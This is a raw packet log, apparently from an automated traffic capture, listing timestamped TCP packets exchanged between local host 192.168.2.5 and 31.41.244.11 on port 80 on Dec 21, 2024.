                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.890280962 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.890317917 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.890362024 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.891442060 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.891483068 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.891592026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.891637087 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.892637014 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.892678976 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.892687082 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.892730951 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.893949986 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.894015074 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.894054890 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.894099951 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.895081043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.895127058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.895140886 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.895184994 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.896471977 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.896523952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.896559000 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.896605968 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.897488117 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.897536993 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.897602081 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.897650003 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.898730040 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.898785114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.898875952 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.898931980 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.899997950 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.900047064 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.900064945 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.900110960 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.901211023 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.901288986 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.901297092 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.901375055 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.902399063 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.902445078 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.902446985 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.902489901 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.903671026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.903682947 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.903733015 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.903733969 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.904809952 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.904856920 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.905004978 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.905045033 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.906054020 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.906074047 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.906107903 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.906107903 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.907215118 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.907262087 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.907334089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.907382011 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.908468962 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.908515930 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.908622026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.908663988 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.909704924 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.909751892 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.909755945 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.909800053 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.910816908 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.910862923 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039120913 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039222956 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039275885 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039341927 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039607048 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039649963 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039719105 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.039761066 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.040795088 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.040847063 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.041244984 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.041295052 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.041347980 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.041393042 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.042462111 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.042515993 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.042579889 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.042620897 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.043698072 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.043742895 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.043777943 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.043817997 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.044856071 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.044899940 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.044912100 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.044954062 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.046046972 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.046088934 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.046147108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.046188116 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.047255039 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.047298908 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.047355890 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.047396898 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.048443079 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.048486948 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.048559904 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.048638105 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.049657106 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.049704075 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.049710989 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.049757004 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.050812960 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.050854921 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.050940037 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.050982952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.052069902 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.052109003 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.052133083 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.052172899 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.053235054 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.053278923 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.053352118 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.053406000 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.054471016 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.054517984 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.054527998 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.054574013 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.055638075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.055681944 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.055728912 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.055769920 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.056843042 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.056901932 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.056941032 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.056982994 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.058026075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.058075905 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.058140039 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.058188915 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.059247971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.059297085 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.059375048 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.059416056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.060427904 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.060471058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.060545921 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.060589075 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.061615944 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.061671019 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.061731100 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.061775923 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.062829971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.062887907 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.062939882 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.062988043 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.064013004 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.064063072 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.064110041 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.064150095 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.065216064 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.065254927 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.065320015 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.065376043 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.066435099 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.066452980 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.066498041 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.066498041 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.067612886 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.067652941 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.067760944 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.067802906 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.068837881 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.068878889 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.068907976 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.068945885 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.070019960 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.070061922 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.070138931 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.070175886 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.071211100 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.071255922 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.071305037 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.071345091 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.072416067 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.072459936 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.072495937 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.072540045 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.073636055 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.073668957 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.073678017 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.073705912 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.074815989 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.074852943 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.075093985 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.075134993 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.076018095 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.076061964 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.076127052 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.076169014 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.077212095 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.077274084 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.077315092 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.077368975 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.078444958 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.078484058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.078524113 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.078577042 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.079612970 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.079655886 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.079709053 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.079751968 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.080830097 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.080873013 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.080912113 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.080955982 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.081996918 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.082040071 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.082115889 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.082169056 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.083198071 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.083245993 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.083321095 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.083365917 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.084417105 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.084480047 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.084518909 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.084563017 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.085599899 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.085650921 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.085715055 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.085752964 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.086807013 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.086864948 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.086925030 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.086972952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.088017941 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.088080883 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.088104010 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.088145018 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.089221001 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.089272976 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.089343071 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.089387894 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.090415955 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.090459108 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.090519905 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.090578079 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.091598034 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.091645956 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.091715097 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.091756105 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.092817068 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.092875957 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.092911005 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.092956066 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.094021082 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.094068050 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.094105005 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.094146013 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.095196009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.095240116 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.095307112 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.095350981 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.096390009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.096434116 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.096504927 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:47.096546888 CET4991080192.168.2.531.41.244.11
